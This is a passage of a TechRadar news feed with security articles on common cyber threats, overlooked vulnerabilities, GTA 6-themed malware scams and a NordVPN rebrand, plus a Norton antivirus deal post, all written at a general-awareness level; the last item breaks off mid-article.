                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/mdjvPqJZZunuCQDrfEuBFM-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 01 Jun 2026 10:57:16 +0000</pubDate>                                                                                                                                <updated>Mon, 01 Jun 2026 10:57:29 +0000</updated>
                                                                                                                                            <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Phil Lees ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/mdjvPqJZZunuCQDrfEuBFM-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A hooded figure in front of a laptop. Digital symbols obscure his face and appear to be pouring out of his head]]></media:description>                                                            <media:text><![CDATA[A hooded figure in front of a laptop. Digital symbols obscure his face and appear to be pouring out of his head]]></media:text>
                                <media:title type="plain"><![CDATA[A hooded figure in front of a laptop. Digital symbols obscure his face and appear to be pouring out of his head]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/mdjvPqJZZunuCQDrfEuBFM-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<p>As industries become more digitalized, cybercrime is evolving just as fast. In 2026, <a href="https://www.techradar.com/best/best-online-cyber-security-courses">cyber security</a> threats are no longer opportunistic; they’re intelligent, automated and highly targeted. No organisation is too small to be ignored by cybercriminals.  </p><p>This is borne out in the UK Government’s Cyber Security Breaches Survey 2025, which suggests that 43% of businesses and 30% of charities reported a cyber breach or attack during the previous 12 months. That’s an astonishing 612,000 UK businesses and 61,000 charities affected. </p><p>Despite these statistics, there are ways organizations can minimize breach risk, from identifying key cyber threats to understanding how businesses can stay safe and prepare for what’s next.  </p><h2 id="the-10-most-common-cyber-threats">The 10 Most Common Cyber Threats</h2><p>Let’s start with my list of the 10 most common cyber threats businesses need to prepare for. </p><h2 id="1-ai-powered-phishing-attacks">1. AI-powered phishing attacks  </h2><p>Among those that suffered a breach or cyberattack in the past 12 months, phishing remains the most common and disruptive threat – and this tactic has changed dramatically over the years. </p><p>It’s no longer obvious or poorly written; today, it’s powered by <a href="https://www.techradar.com/best/best-ai-tools">AI tools</a> and we’re seeing attackers mimic internal communication convincingly.  </p><p>As a result, people are far more likely to click on malicious links, share credentials or approve fraudulent payments. In many cases, you don’t realize you’ve been compromised until it’s too late. </p><h2 id="2-ransomware-as-a-service-raas">2. Ransomware-as-a-Service (RaaS)</h2><p>With Ransomware-as-a-Service, we’re seeing criminal groups selling ready-made tools that allow even less experienced attackers to launch serious attacks. 
This “plug-and-play” model has dramatically increased attack volumes. </p><p>Once inside a system, <a href="https://www.techradar.com/best/best-ransomware-protection">ransomware</a> encrypts critical files and attackers demand payment, usually in cryptocurrency, while some also threaten to leak stolen data to increase pressure.  </p><h2 id="3-supply-chain-attacks">3. Supply chain attacks </h2><p>Instead of attacking businesses directly, cybercriminals are now targeting third-party suppliers to gain access to multiple organizations at once. </p><p>This exploits trust – and strong internal <a href="https://www.techradar.com/news/best-internet-security-suites">security</a> often isn’t matched across the supply chain. One compromised vendor can trigger a domino effect across hundreds of businesses.  </p><h2 id="4-deepfake-fraud-and-impersonation">4. Deepfake fraud and impersonation  </h2><p>Deepfakes have quickly moved from novelty to a serious threat. I’m seeing attackers use AI-generated audio and <a href="https://www.techradar.com/best/best-video-editing-software">video</a> to convincingly impersonate executives, managers and clients. </p><p>This is dangerous in finance or procurement, where fraudsters can push employees to transfer funds, approve invoices, or share sensitive data – all while posing as trusted leaders. </p><h2 id="5-credential-stuffing-and-password-attacks">5. Credential stuffing and password attacks </h2><p>Despite growing awareness, weak and reused passwords are still one of the biggest vulnerabilities. Credential stuffing attacks use stolen login details from previous breaches and automatically test them across multiple platforms. </p><p>Because people often reuse passwords, attackers can gain access with very little effort. Once inside, they can escalate access, move through systems and quietly extract sensitive data. </p><h2 id="6-cloud-misconfigurations">6. Cloud misconfigurations </h2><p>Configuration errors remain a major risk. 
Something as simple as an exposed storage bucket or incorrect access setting can leave sensitive data publicly accessible. </p><p>Unlike traditional breaches, these incidents often don’t involve any hacking as the data is simply left unprotected. As <a href="https://www.techradar.com/best/best-cloud-storage">cloud storage</a> environments become more complex, maintaining strong configuration hygiene is now a critical security priority. </p><h2 id="7-iot-and-connected-device-vulnerabilities">7. IoT and connected device vulnerabilities </h2><p>As the Internet of Things (IoT) expands, the attack surface grows significantly. From smart cameras and sensors to industrial machinery, many connected devices still come with limited built-in security. </p><p>Attackers can exploit these devices to access wider corporate networks. Because they’re often overlooked in traditional cyber security strategies, they represent a quiet but fast-growing risk. </p><h2 id="8-insider-threats">8. Insider threats </h2><p>Insider threats are among the hardest risks to manage. People with legitimate access can intentionally steal or leak data, but more often it’s simple human error – like sending information to the wrong person or falling for phishing attacks. </p><p>With remote and hybrid working now the norm, controlling and monitoring access has become even more complex. </p><h2 id="9-business-email-compromise-bec">9. Business email compromise (BEC) </h2><p>Business email compromise is one of the most financially damaging forms of global cybercrime. Attackers infiltrate or spoof email accounts to trick employees into transferring funds or sharing sensitive data. </p><p>These attacks are highly targeted, often based on detailed research. Because they rely on social engineering rather than <a href="https://www.techradar.com/best/best-malware-removal">malware</a>, they can easily bypass traditional security controls.  </p><h2 id="10-zero-day-exploits">10. 
Zero-day exploits </h2><p>We often highlight zero-day vulnerabilities as being especially dangerous. These are flaws unknown to software vendors and therefore unpatched when attackers exploit them. </p><p>Because there’s no immediate fix available, businesses often only realize they’ve been hit after a breach has already happened. And as software ecosystems grow more complex, we’re expecting the risk of undiscovered vulnerabilities to keep increasing. </p><h2 id="how-businesses-can-stay-protected">How businesses can stay protected</h2><p>While cyber threats are evolving rapidly, businesses are not powerless. Strong cyber security comes down to layers of defense, constant awareness and continuous improvement. </p><p>Start with multi-factor authentication across all systems, and keep software updated and properly patched because many attacks exploit vulnerabilities that already have fixes.  </p><p>Invest in employee training too, as human error is still a major weak point and staff need to recognize phishing and suspicious behavior. </p><p>Adopt a zero-trust approach, where no user or device is automatically trusted. Combine that with real-time monitoring, AI analytics and regular security testing to find weaknesses before attackers do.  </p><p>Finally, ensure robust backups and recovery plans are in place, because when something goes wrong, speed matters. Cyber security isn’t a one-off project; it’s an ongoing business priority. </p><h2 id="the-future-of-cyber-threats">The future of cyber threats</h2><p>Looking ahead, we expect cyber threats to grow in volume and become even more sophisticated. Artificial intelligence doesn’t sleep and it will play both sides, helping us defend systems while also powering more advanced attacks. 
</p><p>Breakthroughs like quantum computing could also challenge the <a href="https://www.techradar.com/best/best-encryption-software">encryption</a> standards we rely on today, while the growing complexity of cloud, IoT, and global supply chains will only expand the attack surface. </p><p>The future of cybersecurity will come down to speed, intelligence and adaptability. Organizations that invest in proactive defense, continuous monitoring, and true cyber resilience will be best prepared for what’s next. Cyber threats aren’t just a technical issue; they’re a critical business risk.</p><p><em></em><a href="https://www.techradar.com/best/best-antivirus"><em>We feature the best Antivirus Software: reviewed, tested, and ranked</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ This compact antivirus protection package is now less than £25 — Norton 360 has everything you need to secure your devices against malware, ransomware, and hacking ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/this-compact-antivirus-protection-package-is-now-less-than-gbp25-norton-360-has-everything-you-need-to-secure-your-devices-against-malware-ransomware-and-hacking</link>
                                                                            <description>
                            <![CDATA[ Secure your online life for less than £25 — Norton 360 Standard is 64% off right now ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">X3jbTyf5NSEHN5qwsaULMR</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/cuCXFu5NKCnUotEkc9j2HQ-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 29 May 2026 15:06:34 +0000</pubDate>                                                                                                                                <updated>Fri, 29 May 2026 15:09:38 +0000</updated>
                                                                                                                                            <category><![CDATA[Pro]]></category>
                                                                                                <author><![CDATA[ benedict.collins@futurenet.com (Benedict Collins) ]]></author>                    <dc:creator><![CDATA[ Benedict Collins ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/jEvqGv8wvH7PWZ4XPURyyB.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/cuCXFu5NKCnUotEkc9j2HQ-1280-80.jpg">
                                                            <media:credit><![CDATA[Norton]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[An image with the TechRadar logo above a price cut logo, with an image of the Norton 360 Standard package.]]></media:description>                                                            <media:text><![CDATA[An image with the TechRadar logo above a price cut logo, with an image of the Norton 360 Standard package.]]></media:text>
                                <media:title type="plain"><![CDATA[An image with the TechRadar logo above a price cut logo, with an image of the Norton 360 Standard package.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/cuCXFu5NKCnUotEkc9j2HQ-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<p>If you are looking for an antivirus software package that you can pay for using the change between the seats on your sofa, you've come to the right place. Right now, <a href="https://norton.ow5a.net/c/1943169/3869895/4405?subId1=hawk-custom-tracking&sharedid=tr&param1=aff&param2=uk_pd_dealpost&param3=security" target="_blank">Norton 360 Standard has dropped to £25 (was £70) from Norton</a> for your first year. </p><p>• <a href="https://norton.ow5a.net/c/1943169/3869895/4405?subId1=hawk-custom-tracking&sharedid=tr&param1=aff&param2=uk_pd_dealpost&param3=security" target="_blank">See all Norton 360 deals</a></p><p>This antivirus package can protect three devices against malware, ransomware, and hacking - and even includes cloud backup, a VPN, and a password manager.</p><p>As always, Norton has included its hallmark Scam Protection to spot scams hidden in messages and deepfake videos, with an AI Genie to answer any questions or concerns you might have. Alongside the Standard edition, you can save on annual prices for Plus and Deluxe versions. </p><h2 class="article-body__section" id="section-today-s-top-norton-360-deal"><span>Today's top Norton 360 deal</span></h2><div class="product"><a data-dimension112="5cddbf62-45c7-41b9-8209-709b56376018" data-action="Deal Block" data-label="This compact security suite secures three devices against modern threats like ransomware, malware, and online scams that steal personal and financial information. It also secures your files and credentials from hackers with a 10GB cloud backup and a password manager." data-dimension48="This compact security suite secures three devices against modern threats like ransomware, malware, and online scams that steal personal and financial information. It also secures your files and credentials from hackers with a 10GB cloud backup and a password manager." 
data-dimension25="£24.99" href="https://norton.ow5a.net/c/1943169/3869895/4405?subId1=hawk-custom-tracking&sharedid=tr&param1=aff&param2=uk_pd_dealpost&param3=security" target="_blank" rel="nofollow"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1000px;"><p class="vanilla-image-block" style="padding-top:100.00%;"><img id="vgL7qHX627n345kfc7TRx8" name="norton logo" caption="" alt="" src="https://cdn.mos.cms.futurecdn.net/vgL7qHX627n345kfc7TRx8.jpg" mos="" align="middle" fullscreen="" width="1000" height="1000" attribution="" endorsement="" credit="" class=""></p></div></div></figure></a><p>This compact security suite secures three devices against modern threats like ransomware, malware, and online scams that steal personal and financial information. It also secures your files and credentials from hackers with a 10GB cloud backup and a password manager.<a class="view-deal button" href="https://norton.ow5a.net/c/1943169/3869895/4405?subId1=hawk-custom-tracking&sharedid=tr&param1=aff&param2=uk_pd_dealpost&param3=security" target="_blank" rel="nofollow" data-dimension112="5cddbf62-45c7-41b9-8209-709b56376018" data-action="Deal Block" data-label="This compact security suite secures three devices against modern threats like ransomware, malware, and online scams that steal personal and financial information. It also secures your files and credentials from hackers with a 10GB cloud backup and a password manager." data-dimension48="This compact security suite secures three devices against modern threats like ransomware, malware, and online scams that steal personal and financial information. It also secures your files and credentials from hackers with a 10GB cloud backup and a password manager." 
data-dimension25="£24.99">View Deal</a></p></div><p>Norton 360 Standard adds layers to your personal security with its array of features to protect against modern threats.</p><p>We have regularly tested and reviewed Norton's antivirus protection, and it consistently ranks in our top three picks for the best antivirus software. But if that isn't enough to convince you, consult the latest testing from <a href="https://av-comparatives.org/vendors/norton/" target="_blank" rel="nofollow">AV-Comparatives</a> and <a href="https://www.av-test.org/en/antivirus/home-windows/windows-11/february-2026/norton-norton-360-25.12-261116/" target="_blank" rel="nofollow">AV-TEST</a>, where it has scored top marks.</p><p>Outside of the antivirus protection, Norton 360 Standard also helps protect your browsing when connected to public Wi-Fi networks by securing your internet traffic with a VPN. This stops hackers from intercepting your sensitive data while it travels across the web.</p><p>Outside of ransomware, your important files, photos, and videos can be lost to device failure or memory corruption. The included 10GB of cloud backup ensures you always have a second copy of your treasured memories and important documents.</p><p>Threat actors are increasingly using AI tools to craft highly convincing phishing emails and scams that can convince even the most wary of internet users. To give you the upper hand, Norton's Scam Detection comes equipped with AI to spot the hidden patterns and techniques inside complex online scams.</p><p>Covering three devices for only £25, this Norton 360 Standard deal offers peace of mind for a full year before auto-renewing at the standard price.</p><ul><li><a href="https://www.techradar.com/best/best-antivirus" target="_blank">Take a look at our full guide to the best antivirus software</a></li></ul>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Closing the security blind spots that are a prime entry point for attacks ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/closing-the-security-blind-spots-that-are-a-prime-entry-point-for-attacks</link>
                                                                            <description>
                            <![CDATA[ What if the biggest cyber risk isn’t the feared attack, but a hidden, unknown vulnerability? ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">btroBvfzj4zBkHvdPsvj3c</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/jt92kXfBXVXUWwnKBmDJLn-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 29 May 2026 08:10:09 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Yaz Bekkar ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/jt92kXfBXVXUWwnKBmDJLn-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:description>                                                            <media:text><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:text>
                                <media:title type="plain"><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/jt92kXfBXVXUWwnKBmDJLn-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>What if the biggest <a href="https://www.techradar.com/best/best-online-cyber-security-courses">cybersecurity</a> risk is not the attack you fear most, but the weakness you forgot or never knew was there? </p><p>Many organizations worry that the next breach will come from a highly sophisticated attack so advanced that nothing could have stopped it. That fear is understandable, but the truth is often more uncomfortable. </p><p>In many cases, breaches do not begin with an unstoppable threat. They begin with a blind spot such as a missed patch, a dormant account, a device outside corporate security control or a <a href="https://www.techradar.com/best/firewall">firewall</a> left exposed. These small gaps that are easy to overlook are exactly the kind of gaps attackers know how to find.  </p><p>This is the reality, and one of the key findings from our recent report, which found that, in most cases, it is preventable security issues that open the door. Unpatched firewalls, rogue endpoints, dormant identities and misconfigurations continue to give threat actors the opportunity they need. </p><h2 id="why-are-attackers-focusing-more-on-identity-than-infrastructure">Why are attackers focusing more on identity than infrastructure? </h2><p>Because compromising an identity is often easier and quieter than attacking a system head-on.  </p><p>Once attackers compromise an identity, they are no longer forcing their way in. They are walking in through a trusted door and this is an important shift that we’re now seeing.  </p><p>Stolen usernames and passwords can provide access to cloud services, email and remote access tools, and valid credentials let attackers easily blend in with normal user activity. </p><p>From there, they can escalate privileges, move laterally and turn limited access into broader control over the environment.  </p><p>Sometimes, the speed with which this happens is startling. 
In one case, we found that the time between the initial breach and the execution of a full <a href="https://www.techradar.com/best/best-ransomware-protection">ransomware</a> attack was just three hours. </p><p>In another real-world incident, attackers gained access through a dormant account that had originally been created for a third-party vendor and was never deactivated after the contract ended. One forgotten account eventually became the route to ransomware. </p><h2 id="are-organizations-still-being-exposed-by-endpoint-and-firewall-gaps">Are organizations still being exposed by endpoint and firewall gaps? </h2><p>Yes, and at scale. Attackers actively look for unprotected <a href="https://www.techradar.com/news/best-business-laptops">business laptops</a>, tablets or servers that fall outside normal security controls, because these devices can provide a path around corporate defenses. </p><p>The issue is not always a lack of security tools. In our experience, from monitoring thousands of different environments, the issue often comes down to a lack of consistent configuration. Security tools that have been disabled, whether accidentally or intentionally, present a major security risk. The danger can be heightened because teams may have a false sense of security that comes from having the tool installed in the first place. </p><p>We also know that many organizations are trying to manage too many <a href="https://www.techradar.com/news/best-internet-security-suites">security</a> tools with limited resources. And when teams are overstretched, configuration errors become more likely. That is often where attackers gain their advantage. </p><p>It also helps explain why relatively simple attack techniques remain so effective. 
</p><p>Threat actors continue to exploit known vulnerabilities, including some that have been around for years and can be found in legacy systems such as old <a href="https://www.techradar.com/best/best-linux-server-distro">servers</a> or applications.</p><p>More striking still, from our analysis of last year's data, we found that the vast majority of ransomware incidents exploited firewalls through either a CVE or a vulnerable account. </p><h2 id="why-are-modern-attacks-becoming-harder-to-spot">Why are modern attacks becoming harder to spot? </h2><p>Some of the most malicious behavior can look annoyingly legitimate. </p><p>Threat actors are increasingly relying on living-off-the-land (LOTL) techniques, using legitimate tools already present in the environment to carry out malicious actions. </p><p>One of the clearest examples is fileless <a href="https://www.techradar.com/best/best-malware-removal">malware</a> attacks, which use PowerShell as the primary execution method. </p><p>That creates a serious challenge for defenders. PowerShell is widely used for legitimate IT administration and maintenance. When malicious activity mimics normal operations, it becomes much harder to distinguish threat behavior from business-as-usual. </p><p>This is one of the most difficult blind spots organizations face today: not the threat you can clearly see, but the one that resembles something familiar. </p><h2 id="how-could-agentic-ai-make-this-worse">How could agentic AI make this worse? </h2><p>AI is helping threat actors move faster, adapt quicker and scale their efforts far more efficiently. </p><p>As threat actors adopt agentic AI, the exploitation of common weaknesses is likely to accelerate. These technologies can help cybercriminals scan environments continuously, identify weak configurations in minutes and rewrite malicious code on the fly to avoid detection. 
</p><p>In other words, the same overlooked issues that are already dangerous today could become even more exposed tomorrow. </p><p>That is why basic security weaknesses can no longer be treated as minor issues. In an environment where attacks can be launched and adapted far more quickly, weak <a href="https://www.techradar.com/best/best-identity-management-software">identity management</a> controls, unpatched systems and unmanaged devices become far more costly. </p><h2 id="so-what-should-organizations-do-now">So what should organizations do now? </h2><p>Start with the basics and treat them as strategically important, not operational housekeeping. </p><p>Some of the fastest and most effective improvements include consistent multi-factor authentication and stronger access controls; a disciplined approach to <a href="https://www.techradar.com/best/best-patch-management-tools">patch management</a> and data protection; and regular cybersecurity awareness training for employees. </p><p>But closing blind spots fully requires more than isolated fixes, because resilience depends on visibility. The more fragmented security becomes, the easier it is for critical signals to be missed. When organizations have end-to-end visibility and coordinated management across their environment, they are far better placed to detect both the obvious weaknesses and the hidden ones. </p><p>A unified security strategy is one that combines advanced, AI-powered detection technologies with a fully automated SOC. Working with a provider who can deliver that protection 24/7 through a comprehensive managed security platform reduces the burden on internal teams. </p><p>And that is what long-term cyber resilience is really built on: not just defending against the spectacular attack, but closing the everyday gaps that attackers are counting on. 
</p><p>As I always say, the breach that changes everything often begins with something that seemed too small to matter.</p><p><a href="https://www.techradar.com/best/best-small-and-medium-business-firewall-software"><em>We feature the best small and medium business (SMB) firewall software</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Cybercriminals are using GTA 6 hype to spread malware ahead of launch, NordVPN warns ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/vpn/vpn-privacy-security/cybercriminals-are-using-gta-6-hype-to-spread-malware-ahead-of-launch-nordvpn-warns</link>
                                                                            <description>
                            <![CDATA[ NordVPN warns GTA 6 fans about fake beta keys, phishing pages, Android adware, and malware disguised as early access downloads. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">RMEVWPFdEVgf6tcANGX3M7</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/YfGyyxGmm5hNmhvqh3uodM-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 28 May 2026 08:43:26 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[VPN Privacy &amp; Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[VPN]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                                                                <author><![CDATA[ monicajwrites@gmail.com (Monica J. White) ]]></author>                    <dc:creator><![CDATA[ Monica J. White ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/6AQ4y5nzk8kQ47Yp69GERj.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/YfGyyxGmm5hNmhvqh3uodM-1280-80.jpg">
                                                            <media:credit><![CDATA[Photo Illustration by Thomas Fuller/SOPA Images/LightRocket via Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[The Grand Theft Auto VI (GTA 6) logo is seen displayed on a smartphone screen]]></media:description>                                                            <media:text><![CDATA[The Grand Theft Auto VI (GTA 6) logo is seen displayed on a smartphone screen]]></media:text>
                                <media:title type="plain"><![CDATA[The Grand Theft Auto VI (GTA 6) logo is seen displayed on a smartphone screen]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/YfGyyxGmm5hNmhvqh3uodM-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>NordVPN identified malware and scam campaigns</strong> <strong>targeting GTA 6's fans</strong></li><li><strong>The web is flooded with fake beta keys, trojanized repacks, phishing sites</strong></li><li><strong>PC and Android users are the main targets</strong></li></ul><p>The hype around the release of GTA 6 is real, and threat actors are quick to make the most of it by targeting gamers who are <a href="https://www.techradar.com/gaming/fans-mourn-what-would-have-been-gta-6s-launch-today-my-girl-surprised-me-with-usd100-today-and-thought-gta-6-was-coming-out-tomorrow">disappointed by the game's delayed release</a>. The lead-up to the release of Rockstar Games' most anticipated title makes fans vulnerable to a large number of scams, NordVPN warns.</p><p><a href="https://www.techradar.com/reviews/nordvpn">NordVPN</a>, which consistently ranks at the top of our list of the <a href="https://www.techradar.com/vpn/best-vpn">best VPNs</a>, shared the findings of its Threat Intelligence team. The team discovered a wave of GTA 6-themed scams targeting eager fans with fake installers, non-existent beta keys, phishing pages, and even Android adware pretending to be a "GTA 6 beta" app. </p><p>Attackers are banking on victims clicking first and then thinking later, instilling a sense of urgency through every scam attempt.</p><h2 id="nordvpn-reveals-the-staggering-extent-of-gta-6-scams">NordVPN reveals the staggering extent of GTA 6 scams</h2><p>NordVPN has revealed that PC and Android users are the primary targets of GTA 6 scams, but the threat actors may still promise access to the game on other platforms.</p><p>The game has been confirmed to launch on the PlayStation 5 and the Xbox Series X/S to start with, which threat actors are willingly abusing by promising exclusive beta keys for those consoles. 
Users first fill out a short form, go through a quick verification process, and then are told to either subscribe or download potentially unwanted applications (PUAs). </p><p>Windows users are also targeted by clones of well-known piracy sites. These clones distribute <a href="https://www.techradar.com/news/what-is-malware-and-how-dangerous-is-it">malware</a>, cleverly disguised as the actual game. NordVPN downloaded one of these scam files and found it to look surprisingly legitimate, with a proper game installer that quietly launches a trojan in the background. The malware can modify your PC's RAM, connect to external servers, and download even more malware.</p><p>Android users are subjected to adware that pretends to offer access to the GTA 6 beta. This is especially clever, as the game is unlikely to ever launch on Android, but fake apps that promise access to the game are still cropping up, as shared by NordVPN as well as various <a href="https://www.reddit.com/r/GTA/comments/1t5m6cr/gta6_is_already_on_android/" target="_blank" rel="nofollow">Reddit users</a>. </p><p>NordVPN downloaded one such file and found the app to be an empty shell that plays a video and then makes you download additional data. 
The app tries to get users to pay for a subscription or download further malware, and NordVPN traced it back to a domain that's known for distributing banking trojans, ransomware, and infostealers.</p><p>Even Rockstar Social Club accounts aren't safe: phishing pages attempt to steal login credentials, and the stolen accounts are often resold or used for in-game scams.</p><h2 id="how-to-stay-safe">How to stay safe</h2><p>The general rule of thumb is not to trust anything that didn't come directly from Rockstar Games, the PlayStation Store, or the Xbox Marketplace. <strong>Never download any game-related content from third-party sites</strong>, as even a legitimate-looking site can be a scam.</p><p><strong>Don't trust offers of free beta keys</strong>, either. Follow the official social media channels for these platforms to keep an eye out for legit offers. </p><p>Lastly, <strong>don't share your Rockstar account details</strong> on any websites other than the official site, and <strong>check the URL before you type</strong> them in.</p><p>NordVPN has just <a href="https://www.techradar.com/vpn/vpn-services/protection-needs-to-evolve-nordvpn-rebrands-as-an-all-in-one-vpn-app-for-next-generation-protection">rebranded its Threat Protection suite</a> as next-gen antivirus, so if you want to stay extra safe with a more robust security solution, it's worth checking out.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 'Protection needs to evolve' — NordVPN rebrands as an all-in-one VPN app for next-generation protection  ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/vpn/vpn-services/protection-needs-to-evolve-nordvpn-rebrands-as-an-all-in-one-vpn-app-for-next-generation-protection</link>
                                                                            <description>
                            <![CDATA[ The digital security giant is bringing next-gen antivirus, dark web monitoring, and its industry-leading VPN into a single, unified experience. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">xr4DwLxMzWWKG7t9LmwcBM</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/ewbjV59riV4dExhBbaawtM-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Wed, 27 May 2026 07:00:00 +0000</pubDate>                                                                                                                                <updated>Wed, 27 May 2026 08:25:37 +0000</updated>
                                                                                                                                            <category><![CDATA[VPN Services]]></category>
                                                    <category><![CDATA[VPN]]></category>
                                                                                                                    <dc:creator><![CDATA[ Rene Millman ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/DXDNjzRkphApxN8f5SooCA.png ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/ewbjV59riV4dExhBbaawtM-1280-80.png">
                                                            <media:credit><![CDATA[NordVPN]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[NordVPN rebranding, all-in-one app (May 2026)]]></media:description>                                                            <media:text><![CDATA[NordVPN rebranding, all-in-one app (May 2026)]]></media:text>
                                <media:title type="plain"><![CDATA[NordVPN rebranding, all-in-one app (May 2026)]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/ewbjV59riV4dExhBbaawtM-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<ul><li><strong>NordVPN rebrands its app across three pillars: connect, protect, monitor</strong></li><li><strong>Threat Protection's tools are now under a newly launched next-gen antivirus</strong></li><li><strong>Next-gen antivirus tools blocked 4.8 million threats in April alone</strong></li></ul><p>NordVPN is officially changing. The cybersecurity giant has announced a major rebrand, shifting its focus from a standalone VPN provider to an all-in-one digital security app.</p><p>The revamped <a href="https://www.techradar.com/reviews/nordvpn">NordVPN</a> application is now organized around three core pillars: "<strong>connect</strong>," which refers to the <a href="https://www.techradar.com/vpn/virtual-private-networks">virtual private network</a> tech; "<strong>protect</strong>," where what's known as the <a href="https://www.techradar.com/vpn/vpn-services/after-a-year-of-using-threat-protection-pro-a-nordvpn-plus-plan-might-be-the-only-black-friday-vpn-deal-i-recommend">Threat Protection</a> suite becomes next-generation antivirus; and "<strong>monitor</strong>," which includes tools like <a href="https://www.techradar.com/vpn/vpn-services/google-killed-its-dark-web-scanner-but-nordvpns-upgraded-tool-is-here-to-track-your-leaked-data">Dark Web Monitor</a>.</p><p>As Marijus Briedis, CTO at NordVPN, said in a press statement: "Such an approach reflects what users increasingly want from digital protection: stronger security, less complexity, and fewer separate tools to install and manage."</p><h2 id="the-need-for-a-next-gen-antivirus">The need for a next-gen antivirus</h2><figure class="van-image-figure  inline-layout" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:886px;"><p class="vanilla-image-block" style="padding-top:56.21%;"><img id="vuyxrMovXEkAjxzafD682T" name="Image_1" alt="NordVPN next-gen antivirus, promo image May 2026" 
